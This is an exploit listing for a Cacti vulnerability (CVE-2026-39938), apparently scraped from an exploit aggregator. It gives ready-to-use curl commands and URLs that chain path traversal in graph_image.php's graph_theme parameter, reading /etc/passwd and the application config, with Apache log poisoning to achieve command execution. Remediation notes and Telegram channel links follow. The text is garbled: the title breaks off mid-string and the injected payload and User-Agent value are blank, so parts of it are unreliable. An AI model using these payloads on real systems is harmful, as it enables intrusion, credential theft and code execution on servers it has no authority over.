Exploit for OS Command Injection in Cacti CVE-2026-39938

Name: Exploit for OS Command Injection in Cacti CVE-2026-39938
Rating: 5 (10 reviews)
2026-06-26 | CVSS 9.8
## https://sploitus.com/exploit?id=C1779145-9574-5457-B610-1891430BF6B2
# CVE-2026-39938: Cacti "
```

#### 3.2 Execute the Code by Including Log File
```bash
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log"
```

**Result:** Command output (e.g., `uid=33(www-data)`) will be displayed.

---

## Common Endpoints Tested

| Endpoint | Parameter | Payload Example |
|----------|-----------|-----------------|
| `/graph_image.php` | `graph_theme` | `../../../../../../../etc/passwd` |
| `/graph_image.php` | `graph_theme` | `../../../../include/config.php` |
| `/graph_image.php` | `graph_theme` | `../../../../../../../var/log/apache2/access.log` |

---

## PoC URL Examples

### Basic LFI Test
```
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd
```

### Read Application Config
```
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php
```

### Log Poisoning (Injection)
```
http://target-cacti/graph_image.php?local_graph_id=1
```
With Header: `User-Agent: `

### Log Poisoning (Execution)
```
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log
```

---

## Remediation

### Update to Patched Version
```bash
cd /var/www/html/cacti
git fetch --tags
git checkout tags/release/1.2.31
```

### Verify Patch Applied
```bash
grep -A 5 "if (isset(\$graph_data_array\['graph_theme'\]))" lib/rrd.php | grep basename
```

### Temporary Mitigation (.htaccess)
```apache
RewriteCond %{QUERY_STRING} (^|&)graph_theme=\.\./ [NC]
RewriteRule ^graph_image\.php$ - [F,L]
```

---

## References
- [GitHub Security Advisory](https://github.com/Cacti/cacti/security/advisories/GHSA-rm7p-qcqm-x5m6)
- [Patch Commit 9871f0c](https://github.com/Cacti/cacti/commit/9871f0cef9af285398d558c9b3188d5977e01a04)
- [NVD CVE-2026-39938](https://nvd.nist.gov/vuln/detail/CVE-2026-39938)

## W.P.E.F
- [W.P.E.F Telegram chanel #1](https://t.me/wpef0)
- [W.P.E.F Telegram chanel #2](https://t.me/wpef01)

---

*Report generated for security research purposes*
*Date: June 27, 2026*